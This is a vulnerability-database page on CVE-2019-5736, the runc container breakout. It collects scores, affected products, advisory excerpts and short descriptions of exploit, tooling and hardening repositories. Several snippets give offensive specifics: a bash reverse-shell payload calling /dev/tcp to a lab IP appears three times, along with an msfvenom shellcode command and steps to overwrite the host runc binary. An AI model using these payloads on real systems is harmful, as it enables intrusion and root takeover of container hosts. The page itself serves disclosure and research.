8.6
CVSSv3

CVE-2019-5736

Published: 11/02/2019 Updated: 02/02/2024
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 8.6 | Impact Score: 6 | Exploitability Score: 1.8
VMScore: 963
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

runc up to and including 1.0-rc6, as used in Docker prior to 18.09.2 and other products, allows malicious users to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

docker docker

linuxfoundation runc 1.0.0

linuxfoundation runc

redhat enterprise linux server 7.0

redhat openshift 3.4

redhat openshift 3.7

redhat openshift 3.6

redhat openshift 3.5

redhat enterprise linux 8.0

redhat container development kit 3.7

google kubernetes engine -

linuxcontainers lxc

hp onesphere -

netapp solidfire -

netapp hci management node -

apache mesos

opensuse leap 42.3

opensuse leap 15.0

opensuse leap 15.1

opensuse backports sle 15.0

d2iq kubernetes engine

d2iq dc\\/os

fedoraproject fedora 29

fedoraproject fedora 30

canonical ubuntu linux 16.04

canonical ubuntu linux 18.04

canonical ubuntu linux 18.10

canonical ubuntu linux 19.04

microfocus service management automation 2018.05

microfocus service management automation 2018.02

microfocus service management automation 2018.08

microfocus service management automation 2018.11

Vendor Advisories

Docker could be made to overwrite files as the administrator ...
Synopsis Important: runc security update Type/Severity Security Advisory: Important Topic An update for runc is now available for Red Hat Enterprise Linux 7 ExtrasRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base score ...
Synopsis Important: docker security update Type/Severity Security Advisory: Important Topic An update for docker is now available for Red Hat Enterprise Linux 7 ExtrasRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base s ...
Synopsis Important: container-tools:rhel8 security and bug fix update Type/Severity Security Advisory: Important Topic An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8Red Hat Product Security has rated this update as having a security impact of Important A Com ...
Synopsis Important: OpenShift Container Platform 34, 35, 36, and 37 security update Type/Severity Security Advisory: Important Topic An update is now available for Red Hat OpenShift Container Platform 34, 35, 36, and 37Red Hat Product Security has rated this update as having a security impact of Im ...
Synopsis Important: Container Development Kit 370-1 security update Type/Severity Security Advisory: Important Topic Red Hat Container Development Kit 370-1 update is now availableRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring Sys ...
Synopsis Important: docker security update Type/Severity Security Advisory: Important Topic An update for docker is now available for Red Hat Enterprise Linux 7 ExtrasRed Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (CVSS) base s ...
Debian Bug report logs - #922050 runc: CVE-2019-5736 Package: src:runc; Maintainer for src:runc is Debian Go Packaging Team <pkg-go-maintainers@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Mon, 11 Feb 2019 15:18:01 UTC Severity: grave Tags: patch, security, upstream Found in ...
Debian Bug report logs - #929733 firejail: CVE-2019-12499: binary can be truncated by root under certain conditions Package: src:firejail; Maintainer for src:firejail is Reiner Herrmann <reiner@reiner-hde>; Reported by: Reiner Herrmann <reiner@reiner-hde> Date: Wed, 29 May 2019 17:24:02 UTC Severity: important Tags ...
Debian Bug report logs - #922059 flatpak: CVE-2019-8308: vulnerability similar to runc CVE-2019-5736 involving /proc/self/exe Package: flatpak; Maintainer for flatpak is Utopia Maintenance Team <pkg-utopia-maintainers@listsaliothdebianorg>; Source for flatpak is src:flatpak (PTS, buildd, popcon) Reported by: Simon McVitti ...
A vulnerability was discovered in runc, which is used by Docker to run containers runc did not prevent container processes from modifying the runc binary via /proc/self/exe A malicious container could replace the runc binary, resulting in container escape and privilege escalation This was fixed by creating a per-container copy of runc(CVE-2019- ...
A flaw was found in the way runc handled system file descriptors when running containers A malicious container could use this flaw to overwrite contents of the runc binary and consequently run arbitrary commands on the container host system ...
A vulnerability in the Open Container Initiative runc CLI tool used by multiple products could allow an unauthenticated, remote attacker to escalate privileges on a targeted system The vulnerability exists because the affected software improperly handles file descriptors related to /proc/self/exe An attacker could exploit the vulnerability eithe ...
A vulnerability discovered in runc through 10-rc6, as used in Docker before 18092 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, ...

Exploits

This Metasploit module leverages a flaw in runc to escape a Docker container and get command execution on the host as root This vulnerability is identified as CVE-2019-5736 It overwrites the runc binary with the payload and waits for someone to use docker exec to get into the container This will trigger the payload execution Note that executing ...
# Usage Edit HOST inside `payloadc`, compile with `make` Start `nc` and run `pwnsh` inside the container # Notes - This exploit is destructive: it'll overwrite `/usr/bin/docker-runc` binary *on the host* with the payload It'll also overwrite `/bin/sh` inside the container - Tested only on Debian 9 - No attempts were made to make it stable o ...
## CVE-2019-5736 ## This is exploit code for CVE-2019-5736 (and it works for both runc and LXC) The simplest way to use it is to copy the exploit code into an existing container, and run `makesh` However, you could just as easily create a bad image and run that ```console % docker run --rm --name pwnme -dit ubuntu:1810 bash pwnme % docker cp ...

Mailing Lists

<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Re: CVE-2019-5736: runc container breakout exploit code <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: EJ Campbe ...
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Re: linux-distros membership application - Microsoft <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: Sasha Levin ...
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Re: CVE-2019-5736: runc container breakout exploit code <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: Aleksa Sa ...
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> Re: CVE-2019-5736: runc container breakout (all versions) <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: Aleksa ...
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> CVE-2019-5736: runc container breakout exploit code <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: Aleksa Sarai ...
<!--X-Body-Begin--> <!--X-User-Header--> oss-sec mailing list archives <!--X-User-Header-End--> <!--X-TopPNI--> By Date By Thread </form> <!--X-TopPNI-End--> <!--X-MsgBody--> <!--X-Subject-Header-Begin--> runc: CVE-2024-21626: high severity container breakout attack <!--X-Subject-Header-End--> <!--X-Head-of-Message--> From: Ale ...

Github Repositories

CDK - Zero Dependency Container Penetration Toolkit English | 简体中文 Legal Disclaimer Usage of CDK for attacking targets without prior mutual consent is illegal CDK is for security testing purposes only Overview CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency It c

WorldFirst (Public) Docker API Exploit - My security researches involving Docker and Openshift

dockerevil A simple repository to store my security flaws in the docker technology 2016 - 2017 Docker API Privilege Escalation(LPE/RPE) Escalate from Offline Server/Minimal Images/Build from TAR Dockerfile Docker SUDO Privilege Escalation (PoC) Nmap Scripts 2019 CodeStudent1995 Based Exploit OpenShift Privilege Escalation(oc) Other awesome security flaws found in the do

Docker Security Checklist For a more thorough checklist please refer to the latest Docker CIS benchmark Patching Ensure you patch your Docker daemon/containerd etc to protect against escape CVEs such as CVE-2019-5736 CVE-2019-14271 CVE-2020–15257 Follow appropriate Docker security updates Image security Conduct image vulnerability scanning using an appropriate scann

Some POCs or Exploits for vulnerabilities

Exploit for CVE-2019-5736 Version 1 (inspired by original idea DragonSector) use a maliciousso(which used by runc) with malicious entry point (like #!/proc/self/exe) to hijack the execution of runc, and then open '/proc/self/exe' to hold the file descriptor Then 'fork-exec' to run another process, and the child process will inherit the file descriptor F

Kubesploit Kubesploit is a cross-platform post-exploitation HTTP/2 Command &amp; Control server and agent dedicated for containerized environments written in Golang and built on top of Merlin project by Russel Van Tuyl (@Ne0nd0g) Our Motivation While researching Docker and Kubernetes, we noticed that most of the tools available today are aimed at passive scanning for

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs OWASP Docker Security Introduction to Container Security Understanding

5G Telco Lab based on OpenShift

OpenShift 5G Telco Lab 1 - Introduction The 5G Mobile Network standard is built from the ground up to be cloud-native Over the years, and thanks to new standards, not only the legacy architectures have been decoupled (CUPS), but even more flexible initiatives (O-RAN) are now taking over the market Many Telcos are moving to containerized architectures and ditching for good the

CVE-2019-5736 implemented in a self-written container runtime to understand the exploit.

CVE-2019-5736-Custom-Sandbox General CVE-2019-5736 implemented using a shallow, self-written container runtime to understand the exploit Exploit is based on (and almost all copied from) the runc-poc by twistlock: githubcom/twistlock/RunC-CVE-2019-5736/tree/master/malicious_image_POC Container Runtime (quarantine) See code docs for further details Usage: quarantine [O

Docker commands

Docker, Containers, Snyk and Kubernetes Docker Dockerfile Build Multi-Stage Builds Run CMD, RUN and ENTRYPOINT Local credentials Docker Compose Image introspection Containers Copy Clean-up Sidecar design pattern circleci Pass values from Docker Container to Host Set environment variable Conditional Jobs local setup circleci setup Validate config file Build a linear or mat

RunC-CVE-2019-5736 Video: bitly/2WqvILb Blog Post: [wwwidealhaxblogspotcom/2020/05/breaking-out-of-docker-via-runchtml] Here, I like to mention that the original developer of this exploit is Yuval Avrahami at Twistlock Labs Running the POCs Note that running the POCs will overwrite the runC binary on the host It is highly recommened that you create a copy

Awesome Container Security List of awesome resources about container security, including books, blogs, videos, tools, and cases for Docker and Kubernetes Table of Contents 🐳 Docker Security ☸️ Kubernetes Security 🐳 Docker Security Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blo

🖥️ -k4u5h41- #️⃣ CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736) Download file maingo, change the payload in the file into: var payload = "#!/bin/bash \n bash -i &gt;&amp; /dev/tcp/10101412/1234 0&gt;&amp;1" After that, run: go build mai

Exploit code

DOCKER-2019-5736 Exploit code for CVE-2019-5736 accessredhatcom/security/cve/cve-2019-5736 The container escape for Docker The exploit overwriting and executing the host systems runc binary from container Tested on Ubuntu 1604 and distro based Arch Docker versions 1806 go build maingo

📚 A curated list of awesome Docker security resources

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs Docker Security OWASP Docker Security Introduction to Container Securi

Resources for CloudNative security research

Cloud Native Security Resources for Cloud Native Security Research, such as Docker, Kubernetes, etc Pull request welcome Intro 2021:"The Zero Trust Security Practice" by Kevin Chen - article, CN 2020:"Cloud Native Security: Container Security Practice" by Pray3r - article, CN Series of articles: Exploring Container Security by Google - articles Kernel and

Hack The Box Guide by Alen Peric: The Notebook IP: 101010230 Summary: The Notebook introduces us to jwt token manipulation Lots of interesting lessons on base64 encoding/decoding, constructing cookies and manipulating them Great insight into transferring files using netcat This machine also shows us how to manipulate the docker exec environment for privilege escalation T

$50 Million CTF from Hackerone - Writeup

$50 million CTF Writeup Summary For a brief overview of the challenge you can take a look at the following image: Below I will detail each step that I took to solve the CTF, moreover all the bad assumptions that led me to a dead end in some cases Twitter The CTF begins with this tweet: What is this binary? My first thought was try to decode the binary on image’s backg

🌏 [WIP]整理好了之后迁移到 cdk-team/document,包含各类容器、K8s攻防场景的CDK文档。

CDK - Zero Dependency Container Penetration Toolkit English | 简体中文 Legal Disclaimer Usage of CDK for attacking targets without prior mutual consent is illegal CDK is for security testing purposes only Overview CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency It c

Hack The Box Guide by Alen Peric: The Notebook IP: 101010230 Summary: The Notebook introduces us to jwt token manipulation Lots of interesting lessons on base64 encoding/decoding, constructing cookies and manipulating them Great insight into transferring files using netcat This machine also shows us how to manipulate the docker exec environment for privilege escalation T

Awesome Docker Security List of awesome resources about docker security included books, blogs, video, tools and cases Table of Contents Books Blogs Videos Tools Cases Books Container Security by Liz Rice Docker Security by Adrian Mouat Advanced Infrastructure Penetration Testing by Chiheb Chebbi Blogs Docker Security OWASP Docker Security Introduction to Container Securi

CLI tool for spawning and running containers according to the OCI specification

runc Introduction runc is a CLI tool for spawning and running containers on Linux according to the OCI specification Releases You can find official releases of runc on the release page All releases are signed by one of the keys listed in the runckeyring file in the root of this repository Security The reporting process and disclosure communications are outlined here

RunC-CVE-2019-5736 Video: bitly/2WqvILb Blog Post: [wwwidealhaxblogspotcom/2020/05/breaking-out-of-docker-via-runchtml] Here, I like to mention that the original developer of this exploit is Yuval Avrahami at Twistlock Labs Running the POCs Note that running the POCs will overwrite the runC binary on the host It is highly recommened that you create a copy

Tool to test if you're in a Docker container and attempt simple breakouts

Docker Escape Tool Work In Progress This tool will help identify if you're in a Docker container and try some quick escape techniques to help assess the security of your containers This tool is focused specifically on Docker escapes though some of the logic may apply to other container runtimes I intend to follow this up with a blog post on helping secure your Docker co

🖥️ -k4u5h41- #️⃣ CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736) Download file maingo, change the payload in the file into: var payload = "#!/bin/bash \n bash -i &gt;&amp; /dev/tcp/10101412/1234 0&gt;&amp;1" After that, run: go build mai

Proof of concept code for breaking out of docker via runC

Breaking out of Docker via RunC A proof of concept code for CVE-2019-5736 This POC is heavily based on YuvalAvra's POC I do not claim any credit for the code utilised in this POC More information about this vulnerability and a demonstration of how it can be exploited can be found in the worksheet Information in the worksheet is based a blog post by Twistlock Labs Usage

PoC-CVE-2019-5736 PoC for CVE-2019-5736

실행전 (1) stage2c에 IP주소를 호스트에 주소로 바꿉니다 (2) DockerFile로 만듭니다 docker build -t cve (3) docker run -d -t --name cvetest cve (4) 실행하기전 runc바이너리를 백업합니다 cp /usr/bin/docker-runc /usr/bin/docker-runcbak (5) docker exec -it cve /bin/bash 실행합니다 (6) in docker run cd /root &amp;&amp; /ru

Docker commands

Docker, Containers, Snyk and Kubernetes Docker Dockerfile Build Multi-Stage Builds Run CMD, RUN and ENTRYPOINT Local credentials Docker Compose Image introspection Containers Copy Clean-up Sidecar design pattern circleci Pass values from Docker Container to Host Set environment variable Conditional Jobs local setup circleci setup Validate config file Build a linear or mat

Docker runc CVE-2019-5736 exploit Dockerfile. Credits : https://github.com/Frichetten/CVE-2019-5736-PoC.git

Docker-Runc-Exploit Docker runc CVE-2019-5736 exploit Dockerfile Credits : githubcom/Frichetten/CVE-2019-5736-PoCgit

CVE-2019-5736 reproducer This allows you to confirm RunC-CVE-2019-5736 works on your KVM instance Workflow overview Build the dockerio related packages vulerable to CVE-2019-5736 in this repo Launch an Ubuntu 1804 KVM instance on LXD Install the vulnerable *deb packages in the VM Try the procedure introduced at RunC-CVE-2019-5736 Build vulnerable *deb packages $ docker-c

A container analysis and exploitation tool for pentesters and engineers.

Break out the Box (BOtB) BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies What does it do? BOtB is a CLI tool which allows you to: Exploit common container vulnerabilities Perform common container post exploitation actions Provide capability when certain tools or b

Kira's Blog

Kira 的博客 Docker 使用 Docker 搭建 Keepalived 高可用集群 Harbor Auth Token 分析 Docker Registry manifest 分析 Docker Registry 鉴权验证分析 Golang Golang 的启动过程分析 Golang runtimegetg() 的实现 Golang 中不使用分代和紧凑型 GC 的原因 Go runtime 调度器 Kubernetes runc 启动容器过程分析(附 CVE-2019-5736 实现过程

Markdown guide and best practices to harden Docker images

How to harden a Docker image: a tutorial for beginners This tutorial provides a basic overview of Docker and its security mechanisms, discusses best practices for creating Docker containers, and surveys a number of scanning and monitoring software to harden Docker images Table of Contents 1 How does Docker work? 2 How do Docker images interact with the host? 3 How are Docke

NP Govware 2019 Demos

Govware 2019 Exploit Demos Intro This repository attempts to implement the following exploits for Govware 2019: Oracle WebLogic Server CVE-2019-2725 Docker Runc CVE-2019-5736 with docker containers Setup Prequisites for all exploits: Install docker and docker-compose Instructions for Running demos: Change directory to exploit (see Project Structure) cd &lt;exploit di

A quick way to manage various payloads and listeners

venom A quick way to manage various payloads and listeners Summary venompy is a tool that help you manage payloads and listeners ⬢ venom /venompy ▌ ▐·▄▄▄ ▐ ▄ • ▌ ▄ · ▪█·█▌▀▄▀·•█▌▐█▪ ·██ ▐███▪ ▐█▐█•▐▀▀▪▄▐█▐▐▌ ▄█

CVE-2019-5736 POCs

RunC-CVE-2019-5736 Two PoCs for CVE-2019-5736 See Twistlock Labs for an explanation of CVE-2019-5736 and the PoCs The malicious image PoC is heavily based on q3k’s PoC, so all credit goes to him Running the PoCs Note that running the PoCs will overwrite the runc binary on the host It is recommened that you create a copy of your runc binary (commonly at /usr/sbin/runc)

Exploit for the CVE-2019-5736 runc vulnerability

cve-2019-5736-exp This is a proof-of-concept (PoC) exploit for the CVE-2019-5736 vulnerability in runc, the runtime used in Docker Disclaimer I undertook this project as an exercise, for educational reasons and for fun It should go without saying that I do not support unethical and/or illegal misuse of this code Description The vulnerability was discovered by Adam Iwaniuk an

CVE-2019-5736 参考:cve-2019-5736-poc (1) edit poc command in stage2cve (2) build docker docker build -t cve (3) run docker docker run -d cve /bin/bash -c "tail -f /dev/null" (4) backup docker-runc cp /usr/bin/docker-runc /usr/bin/docker-runcbak (5) docker exec -it docker-id /bin/bash (6) edit runsh libseccomp edition Exp:cd /root/libseccomp-251 (7)

2019年网上阅读过的文章记录

以下是我2019年12个月每个月阅读的汇总,文章大多数国外安全文章标题翻译的中文; 渗透 Exchange在渗透测试中的利用 文章中有些好的脚本提供,而不是单单爆破 2019 OSINT指南 渗透的本质是信息收集,永不放弃,有一段时间你会感觉到你已经探索了获取信息的所有可能性。不要放弃。休

My personal awesome list based on GitHub stars

Awesome Stars A curated list of my GitHub stars! Generated by stargazed 🏠 Contents ANTLR (1) ActionScript (1) Assembly (5) Batchfile (1) C (115) C# (26) C++ (135) CMake (2) COBOL (2) CSS (65) Clojure (15) CodeQL (1) CoffeeScript (7) Coq (1) Crystal (5) Dart (7) Dhall (1) Dockerfile (5) EJS (2) Elixir (8) Elm (4) Erlang (3) F# (10) FreeMarker (1) Gherkin (1) Gnuplot (1)

NVIDIA Container Runtime for Docker Documentation The full documentation and frequently asked questions are available on the repository wiki An introduction to the NVIDIA Container Runtime is also covered in our blog post Quickstart Make sure you have installed the NVIDIA driver and a supported version of Docker for your distribution (see prerequisites) If you have a cus

Demo shop service shown in the KubeCon talk (Prevent Embarrassing Cluster Takeovers with This One Simple Trick!)

KubeCon EU 2023 Talk - Demo Shop Service Hello, hello! Welcome to Kuberwear Emporium, where your T-shirt dreams come true! ☸️ This is the repo that houses the kubernetes config as well as the different app versions demoed at KubeConEU 2023 at the talk Prevent Embarrassing Cluster Takeovers with This One Simple Trick!, where we covered how misconfiguration can make services

CVE patches for legacy runc packaged with Docker

CVE Builds for legacy docker-runc This repo provides a backport of patches for CVE-2019-5736 for older versions of runc that were packaged with Docker Build and Releases Refer to the releases section of this repo for the binaries In order to build yourself, or build for different architectures, just run make and the binaries will end up in /dist The binaries will be of the

CVE-2019-5736 This is exploit code for CVE-2019-5736 (and it works for both runc and LXC) The simplest way to use it is to copy the exploit code into an existing container, and run makesh However, you could just as easily create a bad image and run that % docker run --rm --name pwnme -dit ubuntu:1810 bash pwnme % docker cp CVE-2019-5736tar pwnme:/CVE-2019-5736tar

Docker Escape Tool Work In Progress This tool will help identify if you're in a Docker container and try some quick escape techniques to help assess the security of your containers This tool is focused specifically on Docker escapes though some of the logic may apply to other container runtimes I intend to follow this up with a blog post on helping secure your Docker co

Resource for identified attacks against Docker, Kubernetis, Containers Vulnerabilities and Exploitation techniques

Awesome-Docker-Kubernetis-Containers-Vulnerabilities-and-Exploitation Threat Hunting Resource for identified attacks against Docker, Kubernetis, Containers Vulnerabilities and Exploitation techniques Docker Vulnerability Assessment Tools 1 githubcom/PercussiveElbow/docker-escape-tool Dokcer-escape tool usage Do

Resources for CloudNative security research

Cloud Native Security Resources for Cloud Native Security Research, such as Docker, Kubernetes, etc Pull request welcome Intro 2021:"The Zero Trust Security Practice" by Kevin Chen - article, CN 2020:"Cloud Native Security: Container Security Practice" by Pray3r - article, CN Series of articles: Exploring Container Security by Google - articles Kernel and

website address: qingshan-cloud-securityuerappspotcom/ lab1 Write an “AppEngine Standard” App A simple event management website based on Flask + GCP All HTML and JavaScript is served statically to keep secure Users can upload events and dates, or delete events The website could update the remaining time of the event in real time and delete expire

Slides, Cheatsheet and Resources from our Blackhat EU talk

'Reverse Engineering and Exploiting Builds in the Cloud' Conference Material Repository This repository contains material and slides for the talk Reverse Engineering and Exploiting Builds in the Cloud: cheatsheetmd contains multiple commands, Dockerfiles, YML configs that can assist you in your build environment reversing slidespdf are the presentation slides Rec

A dockerfile and docker compose orchestration to setup a business of a gambling system and website using laravel

BetDocker A vulnerable Docker container simulating a gambling website business Comes with Docker Compose files for easy setup and guidance, installed with a Netcat backdoor, a LDAP server and a hosted Laravel website DISCLAIMER This is an insecure Docker container which should only be used for local environments The scenario was used with an insecure version of Docker susce

NVIDIA Container Runtime for Docker Documentation The full documentation and frequently asked questions are available on the repository wiki An introduction to the NVIDIA Container Runtime is also covered in our blog post Quickstart Make sure you have installed the NVIDIA driver and a supported version of Docker for your distribution (see prerequisites) If you have a cus

Docker auditing and enumeration script.

Blowhole Blowhole is a Python-based script that enumerates Docker container configurations and calls Dockerized auditing tools (Batten and Docker Security Benchmark) to investigate Docker configurations and settings on the host machine Usage python blowholepy -h usage: blowholepy [-h] [-i] [-a] -o OUTDIR Blowhole optional arguments: -h, --help show this help m

CVE-2019-5736 POCs

RunC-CVE-2019-5736 Two PoCs for CVE-2019-5736 See Twistlock Labs for an explanation of CVE-2019-5736 and the PoCs The malicious image PoC is heavily based on q3k’s PoC, so all credit goes to him Running the PoCs Note that running the PoCs will overwrite the runc binary on the host It is recommened that you create a copy of your runc binary (commonly at /usr/sbin/runc)

Modified version of CVE-2019-5736-PoC by Frichetten

Docker breakout via runc Originally from : githubcom/Frichetten/CVE-2019-5736-PoC This repo is simply me messing around with the PoC and attempting to figure the exploit's flow

Docker runc CVE-2019-5736 exploit Dockerfile. Credits : https://github.com/Frichetten/CVE-2019-5736-PoC.git

Docker-Runc-Exploit Docker runc CVE-2019-5736 exploit Dockerfile Credits : githubcom/Frichetten/CVE-2019-5736-PoCgit

Bitdefender introspection PoC for VBH This project demonstrates protection for three types of exploits: SMEP/SMAP disabling vDSO modifications runc overwrite SMEP/SMAP disable Overview SMEP: If set, execution of code in a higher ring generates a fault SMAP: If set, access of data in a higher ring generates a fault A malicious program may disable SMAP in order to access dat

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters.

k0otkit - Manipulate K8s in a K8s way Introduction k0otkit is a universal post-penetration technique which could be used in penetrations against Kubernetes clusters With k0otkit, you can manipulate all the nodes in the target Kubernetes cluster in a rapid, covert and continuous way (reverse shell) k0otkit is the combination of Kubernetes and rootkit Prerequisite: k0otkit is

🖥️ -k4u5h41- #️⃣ CVE-2019-5736 Usage : machine is vulnerable to CVE-2019-5736, follow steps in Runc exploit (CVE-2019-5736) Download file maingo, change the payload in the file into: var payload = "#!/bin/bash \n bash -i &gt;&amp; /dev/tcp/10101412/1234 0&gt;&amp;1" After that, run: go build mai

a go security module for container runtime

go-containersec a go security module for container runtime Protect CVE-2024-21626 If you want to update runc to 1112, you can choose dmz as the entrypoint of the container: dmz entrypoint arg0 arg1 Another way to protect CVE-2019-5736 lifubang/runc#62 To use this similar way to protect CVE-2024-21626, we still have a little work to do, it will be comming soon

A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes.

CVE-2022-0847 A simple exploit that uses dirtypipe to inject shellcode into runC entrypoint to implement container escapes Usage Produce base64 encoded shellcode using msf: $ msfvenom -p linux/x64/exec CMD="&lt;command&gt;" -f base64 Compile and run in the container, the overwritten filename is the bin that runC will ex

Web Pentesting

Web-Pentesting General presentation of HTTP and Web What is a web server A web server is an application that runs on the back-end server, which handles all of the HTTP traffic from the client-side browser, routes it to the requests destination pages, and finally responds to the client-side browser Web servers usually run on TCP ports 80 or 443, and are responsible for connecti

Damn Vulnerable Kubernetes Application (DVKA) DVKA is a series of apps deployed on Kubernetes that are damn vulnerable The content of this repository is devided in two sections Challenges Practice your Kubernetes exploitation skills by solving these fun challenges Challenge 1 - Hack The NFT Museum Challenge 2 - Enterprise Grade Network Debugging Console Workshop Learn ever

Cloud computing refers to the delivery of computing services, including storage, processing power, and software, over the internet. Instead of owning and maintaining physical servers or hardware, users can access and use these resources on-demand from a cloud service provider.

Cloud-Pentest Cloud computing refers to the delivery of computing services, including storage, processing power, and software, over the internet Instead of owning and maintaining physical servers or hardware, users can access and use these resources on-demand from a cloud service provider What is the cloud? | Cloud definition : wwwcloudflarecom/learning/cloud/what

A container image that exfiltrates the underlying container runtime to a remote server

whoc A container image that extracts the underlying container runtime and sends it to a remote server Poke at the underlying container runtime of your favorite CSP container platform! WhoC at Defcon 29 Cloud Village Azurescape - whoc-powered research, the first cross-account container takeover in the public cloud (70,000$ bounty) How does it work? As shown by runc CVE-2019-5

An ongoing & curated collection of awesome software, libraries and frameworks, best guidelines and technical resources and cool stuff about Docker Security.

Docker Security An ongoing &amp; curated collection of awesome software, libraries and frameworks, best guidelines and technical resources and cool stuff about Docker Security Docker is a software platform that allows you to build, test, and deploy applications quickly Docker packages software into standardized units called containers that have everything the software n

概览 产品简介 产品概念 使用须知 产品价格 名词解释 使用必读 入门必读 集群版本 维护说明 版本跟踪 126 版本说明 集群管理 创建集群 查看集群 删除集群 通过 Kubectl 管理集群 kubectl 命令行简介 安装及配置 kubectl 使用 web kubectl 集群更新凭证 创建 PVC 创建 Service StatefulSet 示例 ku

云原生(容器云)安全测试镜像

Cloud-Native-Security-Test 容器云测试镜像制作,文章链接 镜像准备 下载构建环境(我已经打包到github) mkdir -p /root/docker/ cd /root/docker/ git clone githubcom/ShadowFl0w/Cloud-Native-Security-Testgit 准备其他工具 cd /root/docker/Cloud-Native-Security-Test #下载Tomcat wget archiv

NVIDIA Container Runtime for Docker Documentation The full documentation and frequently asked questions are available on the repository wiki An introduction to the NVIDIA Container Runtime is also covered in our blog post Quickstart Make sure you have installed the NVIDIA driver and a supported version of Docker for your distribution (see prerequisites) If you have a cus

PoC for CVE-2019-5736

CVE-2019-5736-PoC PoC for CVE-2019-5736 Created with help from @singe, @_cablethief, and @feexd Tested on Ubuntu 1804, Debian 9, and Arch Linux Docker versions 18091-ce and 18031-ce This PoC does not currently work with Ubuntu 1604 and CentOS Go checkout the exploit code from Dragon Sector (the people who discovered the vulnerability) here What is it? This is a Go imp

https://nvd.nist.gov/vuln/detail/CVE-2019-5736 poc of CVE-2019-5736

CVE-2019-5736-PoC nvdnistgov/vuln/detail/CVE-2019-5736 poc of CVE-2019-5736

Damn Vulnerable Kubernetes App (DVKA) is a series of apps deployed on Kubernetes that are damn vulnerable.

Damn Vulnerable Kubernetes Application (DVKA) DVKA is a series of apps deployed on Kubernetes that are damn vulnerable The content of this repository is divided into two sections Challenges Practice your Kubernetes exploitation techniques by solving these fun challenges Challenge 1 - Hack The NFT Museum Challenge 2 - Enterprise Grade Network Debugging Console Workshop Lear

Docker Security Checklist For a more thorough checklist please refer to the latest Docker CIS benchmark Patching Ensure you patch your Docker daemon/containerd etc to protect against escape CVEs such as CVE-2019-5736 CVE-2019-14271 CVE-2020–15257 Follow appropriate Docker security updates Image security Conduct image vulnerability scanning using an appropriate scann

Repo for BAWIM project

